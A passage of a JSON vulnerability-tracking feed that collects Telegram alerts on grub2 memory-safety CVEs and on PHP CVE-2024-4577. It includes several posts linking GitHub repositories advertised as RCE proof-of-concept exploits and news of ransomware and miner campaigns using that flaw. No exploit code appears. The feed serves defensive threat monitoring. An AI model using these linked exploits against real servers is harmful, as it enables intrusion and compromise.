Modified: 2025-03-11T21:56:53.472Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/security/cve/CVE-2024-45774\n2. https://bugzilla.redhat.com/show_bug.cgi?id=2337461\n3. https://lists.gnu.org/archive/html/grub-devel/2025-02/msg00024.html", "creation_timestamp": "2025-03-11T22:39:52.000000Z"}, {"uuid": "76d8790a-c3f4-432b-9625-320b8e0c1a90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45775", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7647", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-45775\n\ud83d\udd25 CVSS Score: 5.2 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2 where the grub_extcmd_dispatcher() function calls grub_arg_list_alloc() to allocate memory for the grub's argument list. However, it fails to check in case the memory allocation fails. Once the allocation fails, a NULL point will be processed by the parse_option() function, leading grub to crash or, in some rare scenarios, corrupt the IVT data.\n\ud83d\udccf Published: 2025-02-18T19:25:40.364Z\n\ud83d\udccf Modified: 2025-03-15T00:16:41.672Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/security/cve/CVE-2024-45775\n2. https://bugzilla.redhat.com/show_bug.cgi?id=2337481", "creation_timestamp": "2025-03-15T00:45:39.000000Z"}, {"uuid": "99ca5348-e7b9-4111-90ca-a17fb476e4c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45779", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8366", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-45779\n\ud83d\udd25 CVSS Score: 4.1 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: An integer overflow flaw was found in the BFS file system driver in grub2. When reading a file with an indirect extent map, grub2 fails to validate the number of extent entries to be read. A crafted or corrupted BFS filesystem may cause an integer overflow during the file reading, leading to a heap of bounds read. As a consequence, sensitive data may be leaked, or grub2 will crash.\n\ud83d\udccf Published: 2025-03-03T14:25:22.453Z\n\ud83d\udccf Modified: 2025-03-21T15:56:16.213Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/security/cve/CVE-2024-45779\n2. https://bugzilla.redhat.com/show_bug.cgi?id=2345854\n3. https://lists.gnu.org/archive/html/grub-devel/2025-02/msg00024.html", "creation_timestamp": "2025-03-21T16:19:24.000000Z"}, {"uuid": "0a42c93d-01aa-4d56-9e3a-5ed3eadfbf2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45779", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8595", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-45779\n\ud83d\udd25 CVSS Score: 6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H)\n\ud83d\udd39 Description: An integer overflow flaw was found in the BFS file system driver in grub2. When reading a file with an indirect extent map, grub2 fails to validate the number of extent entries to be read. A crafted or corrupted BFS filesystem may cause an integer overflow during the file reading, leading to a heap of bounds read. As a consequence, sensitive data may be leaked, or grub2 will crash.\n\ud83d\udccf Published: 2025-03-03T14:25:22.453Z\n\ud83d\udccf Modified: 2025-03-25T04:57:55.572Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/security/cve/CVE-2024-45779\n2. https://bugzilla.redhat.com/show_bug.cgi?id=2345854\n3. https://lists.gnu.org/archive/html/grub-devel/2025-02/msg00024.html", "creation_timestamp": "2025-03-25T05:23:34.000000Z"}, {"uuid": "9aff29ca-d5f4-4b31-8400-0e1d914fd186", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45777", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11036", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-45777\n\ud83d\udd25 CVSS Score: 6.7 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2. The calculation of the translation buffer when reading a language .mo file in grub_gettext_getstr_from_position() may overflow, leading to a Out-of-bound write. This issue can be leveraged by an attacker to overwrite grub2's sensitive heap data, eventually leading to the circumvention of secure boot protections.\n\ud83d\udccf Published: 2025-02-19T17:54:01.926Z\n\ud83d\udccf Modified: 2025-04-09T09:00:32.145Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/security/cve/CVE-2024-45777\n2. https://bugzilla.redhat.com/show_bug.cgi?id=2346343", "creation_timestamp": "2025-04-09T09:47:39.000000Z"}, {"uuid": "ff8cd45f-758b-4168-8e0d-d924c9f49b07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45775", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15179", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-45775\n\ud83d\udd25 CVSS Score: 5.2 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2 where the grub_extcmd_dispatcher() function calls grub_arg_list_alloc() to allocate memory for the grub's argument list. However, it fails to check in case the memory allocation fails. Once the allocation fails, a NULL point will be processed by the parse_option() function, leading grub to crash or, in some rare scenarios, corrupt the IVT data.\n\ud83d\udccf Published: 2025-02-18T19:25:40.364Z\n\ud83d\udccf Modified: 2025-05-06T17:46:48.513Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/security/cve/CVE-2024-45775\n2. https://bugzilla.redhat.com/show_bug.cgi?id=2337481", "creation_timestamp": "2025-05-06T18:21:35.000000Z"}, {"uuid": "488df3e8-3ab3-45c4-b681-933098d0bc15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45776", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15178", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-45776\n\ud83d\udd25 CVSS Score: 6.7 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: When reading the language .mo file in grub_mofile_open(), grub2 fails to verify an integer overflow when allocating its internal buffer. A crafted .mo file may lead the buffer size calculation to overflow, leading to out-of-bound reads and writes. This flaw allows an attacker to leak sensitive data or overwrite critical data, possibly circumventing secure boot protections.\n\ud83d\udccf Published: 2025-02-18T19:25:45.929Z\n\ud83d\udccf Modified: 2025-05-06T17:47:08.378Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/security/cve/CVE-2024-45776\n2. https://bugzilla.redhat.com/show_bug.cgi?id=2339182", "creation_timestamp": "2025-05-06T18:21:34.000000Z"}, {"uuid": "c052ec7d-b9af-483c-b071-b4b2d4a1208e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45774", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18456", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-45774\n\ud83d\udd25 CVSS Score: 6.7 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2. A specially crafted JPEG file can cause the JPEG parser of grub2 to incorrectly check the bounds of its internal buffers, resulting in an out-of-bounds write. The possibility of overwriting sensitive information to bypass secure boot protections is not discarded.\n\ud83d\udccf Published: 2025-02-18T18:25:09.511Z\n\ud83d\udccf Modified: 2025-06-16T14:08:16.051Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:6990\n2. https://access.redhat.com/security/cve/CVE-2024-45774\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2337461\n4. https://lists.gnu.org/archive/html/grub-devel/2025-02/msg00024.html", "creation_timestamp": "2025-06-16T14:38:11.000000Z"}, {"uuid": "32c1d90d-e678-458d-85aa-ced17d413df2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/25700", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aPHP RCE PoC for CVE-2024-4577 written in bash, go, python and a nuclei template cve-2024-4577, pentest, php, poc, rce-exploit, redteam\nURL\uff1ahttps://github.com/fabulouscounc/CVE-2024-4577-PHP-RCE\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-03-27T17:27:32.000000Z"}, {"uuid": "9d91a409-c98d-487d-a7e3-4a696c164e36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/23373", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aPHP RCE PoC for CVE-2024-4577 written in bash, go, python and a nuclei template cve-2024-4577, pentest, php, poc, rce-exploit, redteam\nURL\uff1ahttps://github.com/creamylegum/CVE-2024-4577-PHP-RCE\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-03-23T18:53:04.000000Z"}, {"uuid": "8fc08a6e-3763-4867-a4f7-7de7d5dd3665", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/33246", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aPHP RCE PoC for CVE-2024-4577 written in bash, go, python and a nuclei template cve-2024-4577, pentest, php, poc, rce-exploit, redteam\nURL\uff1ahttps://github.com/cheerfulempl/CVE-2024-4577-PHP-RCE\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-04-20T22:35:40.000000Z"}, {"uuid": "bf0d534d-ef14-4f0e-afac-da87c284f8c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/30919", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aPHP RCE PoC for CVE-2024-4577 written in bash, go, python and a nuclei template cve-2024-4577, pentest, php, poc, rce-exploit, redteam\nURL\uff1ahttps://github.com/deadlybangle/CVE-2024-4577-PHP-RCE\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-04-10T12:11:14.000000Z"}, {"uuid": "3db2908b-56ac-4021-8b75-2e0b06b96e97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/43669", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aDelivering PHP RCE (CVE-2024-4577) to the Local Network Servers\nURL\uff1ahttps://github.com/ZeroMemoryEx/PHP-CGI-INTERNAL-RCE\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-07-11T12:53:45.000000Z"}, {"uuid": "d772ff32-dfe8-48f8-8b0c-a017c3de9986", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/BleepingComputer/20131", "content": "\u200aTellYouThePass ransomware exploits recent PHP RCE flaw to breach servers\n\nThe TellYouThePass ransomware gang has been exploiting the recently patched CVE-2024-4577\u00a0remote code execution vulnerability in PHP to deliver webshells and execute the encryptor payload on target systems. [...]\n\nhttps://www.bleepingcomputer.com/news/security/tellyouthepass-ransomware-exploits-recent-php-rce-flaw-to-breach-servers/", "creation_timestamp": "2024-06-11T20:55:39.000000Z"}, {"uuid": "2e1ffb2b-b4c1-486a-bc7e-f4cbd56c4ea3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/BleepingComputer/20531", "content": "\u200aHackers use PHP exploit to backdoor Windows systems with new malware\n\nUnknown attackers have deployed a newly discovered backdoor dubbed Msupedge on a university's Windows systems in Taiwan, likely by exploiting a recently patched PHP remote code execution vulnerability (CVE-2024-4577). [...]\n\nhttps://www.bleepingcomputer.com/news/security/hackers-use-php-exploit-to-backdoor-windows-systems-with-new-malware/", "creation_timestamp": "2024-08-20T18:09:38.000000Z"}, {"uuid": "b042a612-5ca1-4471-9d18-d2028d9cf762", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/CyberGovIL/2017", "content": "\u05e4\u05e2\u05d9\u05dc\u05d5\u05ea \u05e7\u05d1\u05d5\u05e6\u05ea \u05d4\u05db\u05d5\u05e4\u05e8\u05d4 TellYouThePass\n\n\u05de\u05de\u05d9\u05d3\u05e2 \u05d1\u05d9\u05d3\u05d9 \u05de\u05e2\u05e8\u05da \u05d4\u05e1\u05d9\u05d9\u05d1\u05e8 \u05d4\u05dc\u05d0\u05d5\u05de\u05d9 \u05e2\u05d5\u05dc\u05d4 \u05db\u05d9 \u05d4\u05d2\u05d5\u05e8\u05de\u05d9\u05dd \u05d4\u05e2\u05d5\u05de\u05d3\u05d9\u05dd \u05de\u05d0\u05d7\u05d5\u05e8\u05d9 \u05d4\u05db\u05d5\u05e4\u05e8\u05d4 \u05d4\u05de\u05d5\u05db\u05e8\u05ea \u05d1\u05e9\u05dd TellYouThePass \u05de\u05e0\u05e6\u05dc\u05d9\u05dd \u05d1\u05e6\u05d5\u05e8\u05d4 \u05de\u05e9\u05de\u05e2\u05d5\u05ea\u05d9\u05ea \u05d0\u05ea \u05e4\u05d2\u05d9\u05e2\u05d5\u05ea CVE-2024-4577 \u05d1\u05e9\u05e8\u05ea\u05d9 PHP \u05e2\u05dc \u05d2\u05d1\u05d9 \u05de\u05e2\u05e8\u05db\u05ea \u05d4\u05e4\u05e2\u05dc\u05d4 Windows.\n\n\u05dc\u05d4\u05ea\u05e8\u05e2\u05d4 \u05d6\u05d5 \u05de\u05e6\u05d5\u05e8\u05e3 \u05e7\u05d5\u05d1\u05e5 \u05de\u05d6\u05d4\u05d9\u05dd, \u05d4\u05e2\u05e9\u05d5\u05d9 \u05dc\u05d0\u05e4\u05e9\u05e8 \u05d6\u05d9\u05d4\u05d5\u05d9 \u05e9\u05dc \u05e4\u05e2\u05d9\u05dc\u05d5\u05ea \u05d4\u05e7\u05d1\u05d5\u05e6\u05d4. \u05de\u05d5\u05de\u05dc\u05e5 \u05dc\u05e0\u05d8\u05e8\u05dd \u05d1\u05db\u05dc \u05de\u05e2\u05e8\u05db\u05d5\u05ea \u05d4\u05d0\u05d1\u05d8\u05d7\u05d4 \u05d4\u05d0\u05e8\u05d2\u05d5\u05e0\u05d9\u05d5\u05ea \u05d4\u05e8\u05dc\u05d5\u05d5\u05e0\u05d8\u05d9\u05d5\u05ea.\n\n\n\u05dc\u05d4\u05e6\u05d8\u05e8\u05e4\u05d5\u05ea \u05dc\u05e7\u05d1\u05dc\u05ea \u05d4\u05ea\u05e8\u05d0\u05d5\u05ea \ud83d\udd17\n\u05d5\u05d5\u05d0\u05d8\u05e1\u05d0\u05e4 https://shortlnk.net/WhatsApp\n\u05d8\u05dc\u05d2\u05e8\u05dd https://shortlnk.net/Telegram", "creation_timestamp": "2024-07-01T11:46:04.000000Z"}, {"uuid": "8e3e403e-6f37-4da6-b38f-3a3c849a0e33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/OiY4iuYASwt65w5mg-AnLSFNqsxuGtQRvoN9gsyxq20gpog", "content": "", "creation_timestamp": "2025-08-23T21:00:04.000000Z"}, {"uuid": "13cf9c5f-e5ec-4e07-a209-ee98a4e4dfc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/ddos_guard/663", "content": "\u200b\u0425\u0430\u043a\u0435\u0440\u044b \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u044e\u0442 \u043c\u0430\u0439\u043d\u0435\u0440\u044b \u0438 \u0442\u0440\u043e\u044f\u043d\u044b, \u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0432 \u043a\u0440\u0438\u043f\u0442\u043e\u0444\u0435\u0440\u043c\u044b\n\n\u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u043f\u043e \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0432\u0441\u043f\u043b\u0435\u0441\u043a \u0430\u0442\u0430\u043a \u0447\u0435\u0440\u0435\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-4577 \u0432 PHP \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c Windows. \u0425\u0430\u043a\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0435\u0435, \u0447\u0442\u043e\u0431\u044b \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0438 \u0437\u0430\u0440\u0430\u0436\u0430\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u044b.\n\n\u041d\u0430 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 \u043e\u043d\u0438 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u044e\u0442 \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u044b XMRig \u0438 Nicehash, \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u044f \u0438\u0445 \u043f\u043e\u0434 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b. \u0422\u0430\u043a\u0436\u0435 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044e\u0442 \u0442\u0440\u043e\u044f\u043d\u044b, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, Quasar RAT, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f. \u041c\u043d\u043e\u0433\u0438\u0435 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u044e\u0442\u0441\u044f \u0441 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438: \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0437\u0443\u0447\u0430\u044e\u0442 \u0441\u0435\u0442\u044c, \u0441\u043e\u0431\u0438\u0440\u0430\u044e\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u0445 \u0438 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0445 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430\u0445.\n\n\u0411\u043e\u043b\u044c\u0448\u0435 \u0432\u0441\u0435\u0433\u043e \u0430\u0442\u0430\u043a \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u043d\u0430 \u0422\u0430\u0439\u0432\u0430\u043d\u0435, \u0432 \u0413\u043e\u043d\u043a\u043e\u043d\u0433\u0435 \u0438 \u0411\u0440\u0430\u0437\u0438\u043b\u0438\u0438. \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u0437\u043b\u043e\u043c\u0449\u0438\u043a\u0438 \u0434\u0430\u0436\u0435 \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u044e\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c IP, \u0447\u0442\u043e\u0431\u044b \u0434\u0440\u0443\u0433\u0438\u0435 \u0445\u0430\u043a\u0435\u0440\u044b \u043d\u0435 \u0441\u043c\u043e\u0433\u043b\u0438 \u0437\u0430\u0440\u0430\u0437\u0438\u0442\u044c \u0442\u0443 \u0436\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u0443.\n\n\u0427\u0442\u043e\u0431\u044b \u043d\u0435 \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u043f\u043e\u0434 \u0430\u0442\u0430\u043a\u0443, \u043d\u0443\u0436\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c PHP, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a PowerShell \u0438 \u0441\u043b\u0435\u0434\u0438\u0442\u044c \u0437\u0430 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c\u044e \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435.", "creation_timestamp": "2025-03-24T10:53:08.000000Z"}, {"uuid": "36975279-def9-4e70-92ba-f5b92933c4ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/claytechsolution/258", "content": "The Hacker News\nHackers Exploit Severe PHP Flaw to Deploy Quasar RAT and XMRig Miners\n\nThreat actors are exploiting a severe security flaw in PHP to deliver cryptocurrency miners and remote access trojans (RATs) like Quasar RAT.\nThe vulnerability, assigned the CVE identifier CVE-2024-4577, refers to an argument injection vulnerability in PHP affecting Windows-based systems running in CGI mode that could allow remote attackers to run arbitrary code.\nCybersecurity company", "creation_timestamp": "2025-03-19T16:54:00.000000Z"}, {"uuid": "7d7958e4-ba83-4800-8cb2-034cb6bde6c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/hackyourmom/11421", "content": "\u0423\u0437\u043a\u0456\u0445 \u0445\u0430\u043a\u0435\u0440\u0456\u0432 \u0448\u0438\u0444\u0440\u0443\u0432\u0430\u043b\u044c\u043d\u0438\u043a\u0456\u0432 \u0437 LockBit \u0437\u043b\u0430\u043c\u0430\u0432 \u0442\u0430 \u043f\u0440\u0438\u043d\u0438\u0437\u0438\u0432 \u0445\u0430\u043a\u0435\u0440 xoxo \u0437 \u041f\u0440\u0430\u0433\u0438 \ud83e\udd23 \u0431\u043e \u0424\u0411\u0420 \u0442\u0430\u043a \u043d\u0435 \u0432\u043c\u0456\u0454 \ud83e\udd23 \u0432 \u043d\u0438\u0445 \u0422\u0440\u0430\u043c\u043f \u0432\u0441\u0456\u0445 \u0430\u0434\u0435\u043a\u0432\u0430\u0442\u043d\u0438\u0445 \u0441\u043a\u043e\u0440\u043e\u0442\u0438\u0432 \u0442\u0430 \u0432\u0456\u0434\u043f\u0440\u0430\u0432\u0438\u0432 \u043d\u0430 \u043f\u0440\u0438\u0432\u0430\u0442\u043d\u0438\u0439 \u0440\u0438\u043d\u043e\u043a\ud83d\ude43 \u0430\u043b\u0435 \u0446\u0435 \u043d\u0435 \u0442\u043e\u0447\u043d\u043e \u0456 \u043b\u0438\u0448\u0435 \u0437\u0430 \u0432\u0435\u0440\u0441\u0456\u0454\u044e \u043c\u0430\u043c\u043a\u0456\u043d\u0438\u0445 \u0445\u0430\u043a\u0435\u0440\u0456\u0432, \u0442\u043e\u0447\u043d\u043e \u0448\u043e:\n\n\u041d\u0430\u0434 #LockBit \u0442\u0435\u043f\u0435\u0440 \u0443\u0433\u0430\u0440\u0430\u044e\u0442\u044c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u0442\u0438 \u0437 \u0443\u0441\u044c\u043e\u0433\u043e \u0441\u0432\u0456\u0442\u0443 \u0456 \u043e\u0441\u044c \u0447\u043e\u043c\u0443:\n\n\ud83e\udd21 \u0441\u0443\u043f\u0435\u0440 \u043a\u0430\u043a\u0454\u0440\u0438, \u0437\u0431\u0435\u0440\u0456\u0433\u0430\u043b\u0438 \u0441\u0432\u043e\u0457 \u043f\u0430\u0440\u043e\u043b\u0456 \u0442\u0430 \u043f\u0430\u0440\u043e\u043b\u0456 \u00ab\u043f\u0430\u0440\u0442\u043d\u0435\u0440\u0456\u0432\u00bb \u0443 \u0432\u0456\u0434\u043a\u0440\u0438\u0442\u043e\u043c\u0443 \u0432\u0438\u0434\u0456 (\u043d\u0435 \u0445\u0435\u0448) \u0456 \u043f\u0430\u0440\u043e\u043b\u0456 \u0432 \u043d\u0438\u0445, \u043c\u02bc\u044f\u043a\u043e \u043a\u0430\u0436\u0443\u0447\u0438, \u043d\u0435 \u0432\u0456\u0434\u043f\u043e\u0432\u0456\u0434\u0430\u044e\u0442\u044c \u0441\u0435\u0441\u0443\u0440\u0456\u0442\u0456 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u0430\u043c \u0442\u0438\u043f\u0443, \u00abWeekendlover69\u00bb \u0442\u0430 \u0456\u043d\u0448\u0438\u0439 \u0443\u0433\u0430\u0440\n\n\ud83d\udcc0 \u0412 \u0442\u0430\u0431\u043b\u0438\u0446\u0456 Users: \u0432\u0441\u044c\u043e\u0433\u043e \u043b\u0438\u0448\u0435 75 \u043a\u043e\u0440\u0438\u0441\u0442\u0443\u0432\u0430\u0447\u0456\u0432, \u0430\u043a\u0442\u0438\u0432\u043d\u0438\u0445 - \u0449\u0435 \u043c\u0435\u043d\u0448\u0435. \u041f\u0456\u0441\u043b\u044f \u0440\u0435\u0439\u0434\u0443 Operation Cronos \u0432\u0456\u0434 FBI \u0442\u0430 \u0440\u0456\u0437\u043d\u0438\u0445 \u0456\u043d\u0448\u0438\u0445 \u0430\u0433\u0435\u043d\u0446\u0456\u0439 \u0443 \u043d\u0438\u0445 \u0456 \u0442\u0430\u043a \u0432\u0456\u0434\u0432\u0430\u043b\u0438\u043b\u0438\u0441\u044c \u0431\u0456\u043b\u044c\u0448\u0456\u0441\u0442\u044c \u00ab\u043f\u0430\u0440\u0442\u043d\u0435\u0440\u0456\u0432\u00bb, \u0442\u0435\u043f\u0435\u0440 \u0441\u043a\u043e\u0440\u0456\u0448 \u0437\u0430 \u0432\u0441\u0435 \u043d\u0456\u0445\u0442\u043e \u043d\u0435 \u0431\u0443\u0434\u0435 